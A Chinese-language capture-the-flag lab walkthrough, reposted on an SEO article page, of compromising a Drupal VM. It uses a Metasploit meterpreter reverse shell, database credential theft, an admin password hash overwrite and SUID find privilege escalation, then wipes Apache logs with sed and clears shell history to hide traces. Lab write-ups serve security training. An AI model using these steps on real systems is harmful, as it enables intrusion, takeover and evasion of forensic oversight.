当前位置: 首页 > wzjs >正文

武汉网站设计google搜索引擎下载

wzjs 2025/8/21 14:47:41
武汉网站设计,google搜索引擎下载,建筑模板质量标准,做网站建设需要期末周每天都是深深的死感 1.ip地址搜寻 得到靶机地址 192.168.220.129 用nmap扫描端口: nmap -sV -p- 192.168.220.129 可以看到端口22、80、111、45433是开放的。 通过浏览器访问ip地址 通过观察页面,可以发现当前页面无有效信息,但是…

期末周每天都是深深的死感

1.ip地址搜寻

得到靶机地址

192.168.220.129

用nmap扫描端口:

nmap -sV -p- 192.168.220.129

可以看到端口22、80、111、45433是开放的。

通过浏览器访问ip地址

通过观察页面,可以发现当前页面无有效信息,但是有一个重点的地方就是Powered by Drupal

2.扫描主机目录

dirb http://192.168.220.129

3.指纹信息识别

whatweb  -v  192.168.220.129

指纹信息: 获取当前靶机的编程语言、网站模板 CMS、服务器信息

通过指纹信息的扫描可以获取到当前的靶机使用的 CMS 是 Drupal,接下来需要去搜索 Drupal 的相关漏洞

4.漏洞利用

1.使用 msf 的漏洞利用神器,在神器中直接搜索 Drupal 模块

Msfconsole

search Drupal

    2.使用漏洞模块编号为 1

    use 1

    3.显示当前模块下来的 payload

    options

    4.设置 payload

    set payload payload/php/meterpreter/reverse_tcp

    5.查看需要设置的 payload

    6.设置rhosts

    7.运行

    Run

    5.后渗透

    1.查看系统信息

    sysinfo

    2.进入shell,ls

    可以发现当前的命令行窗口不太容易输入命令

    通过输入 python 脚本让其进入到 bin/bash 命令行

    python -c "import pty;pty.spawn('/bin/bash')"

    然后再ls

    找到flag1

    cat  flag1.txt

    flag1 提供的线索是: 让找配置文件

    一般的配置文件在 linux 中以 set 开头,或者.cfg、.xml、.json、.env、.config 结尾

    find . -name "set*"  

    查看 setting.php

    cat ./sites/default/settings.php

    可以发现有 flag2 的存在,同时发现了有数据库的相关信息

    'database' => 'drupaldb',

    'username' => 'dbuser',

    'password' => 'R0ck3t',

    'host' => 'localhost',

    需要连接数据库

    mysql  -udbuser   -pR0ck3t

    查看相关使用的表

    show  databases;

    use drupaldb;

    show tables;

    通过使用 users 表,查看表数据,最终发现用户的密码是加密的

    select  *   from  users\G;

    接下来需要退出数据库,寻找解密方式

    exit:

    通过将结果扔个 AI 查询发现,通过 hash 进行加密,所以需要先从本地寻找 hash 加密的方式

    find . -name '*hash*'

    cat  ./scripts/password-hash.sh

    当前这个 hash 文件主要表达的含义就是,可以使用这个文件进行 hash 值得生成

    ./scripts/password-hash.sh   123456

    之前

    之后

    hash: $S$Dw63kZIdvKD0NKZEv6FfZ3v4NLifV4A7kJv/DpQHKy3KhNhK/MIW

    接下来需要修改数据库中 admin 用户的密码,需要再一次登录数据库

    mysql  -udbuser   -pR0ck3t

    use drupaldb;

    select  *   from  users;

    select  *   from  users\G;

    update  users set pass='$S$DSQKfeXIoP20ZuP9dFas2SfVenJIdSG.CopZmT61YvGJrxW9//RR' where uid=1;

    然后点击 dashboard,找到 flag3

    根据 flag3 的提示需要在 shadow 中找寻下一个目标

    去/etc/passwd 文件中进行寻找

    cd /home/flag4.txt

    ls

    cat flag4.txt

    根据 flag4 的提示信息,想要拿到最终的 flag 需要进行提权到 root

    查看当前的提权方式

    find / -perm -u=s -type f  2>/dev/null

    可以发现使用 find 来进行提权

    find / -exec "/bin/bash" -p \;

    通过 whoami 命令发现提权成功

    一般进入到/root 目录进行 flag 的提取

    6.清除使用痕迹

    中间件的日志清除

    包括 web 请求、msf 漏洞利用产生的日志,需要清除

    find / -name "access*"

    cat  /var/log/apache2/access.log

    sed -i '/192.168.220.129/d' /var/log/apache2/access.log

    清除错误信息

    find / -name 'error*'

    cat  /var/log/apache2/error.log

    sed -i '/192.168.220.129/d' /var/log/apache2/error.log

    让数据库用户的密码进行还原

    mysql  -udbuser   -pR0ck3t

    use drupaldb;

    update  users set pass='

    ' where uid=1;

    数据库日志

    show variables like '%log%';

    general_log 表示每一次执行 sql 时产生的记录,但是当前处于 OFF 状态,不需要清除

    slow_query_log 属于慢查询日志

    清除命令行的命令记录

    history

    history -c

    http://www.dtcms.com/wzjs/430988.html

    相关文章:

  1. 做游戏模型挣钱的网站营销型网站建设排名
  2. 珠海做网站方案网页seo优化
  3. 重庆忠县网站建设公司企业推广是什么职业
  4. 网站 设计公司 温州google框架一键安装
  5. 网站怎么做移动端适配cba目前排行
  6. 网站h5什么意思哪个平台可以免费打广告
  7. 免费个人网站建设大全广州网站优化排名
  8. 一级a做爰片就在线看网站加入网络营销公司
  9. 做交通锁具网站搜索引擎技巧
  10. 织梦网站创建商品栏目搜索引擎排名优化方法
  11. 抖音优化排名杭州优化外包哪里好
  12. 中文网站建设入门网络营销渠道有哪三类
  13. 用织梦做房产网站公众号推广平台
  14. 建设网站时新闻资讯腾讯广告投放推广平台价格
  15. 手机端网站开发工具网站免费搭建平台
  16. 三合一网站怎么建立苏州百度关键词优化
  17. 制作网站得多少钱网站权重一般有几个等级
  18. 做网站开发哪里可以接单怎么看关键词的搜索量
  19. 技术支持:淄博网站建设谷歌seo技巧
  20. 网站设计开发维护网站优化塔山双喜
  21. 建站流程网站上线厦门网站seo哪家好
  22. 个体户可以做企业网站最新新闻热点大事件
  23. 网站托管工作室日照网络推广公司
  24. 网站外链哪里做seo广告优化
  25. 做移动网站优化快有没有专门做营销的公司
  26. 跨境电商热销产品排行济南seo外包服务
  27. 云梦网络 网站模板网页制作的基本步骤
  28. 温州建站费用广州新塘网站seo优化
  29. 修改wordpress默认的登陆地址关键词优化排名费用
  30. 东莞网站建设服务商网络推广教程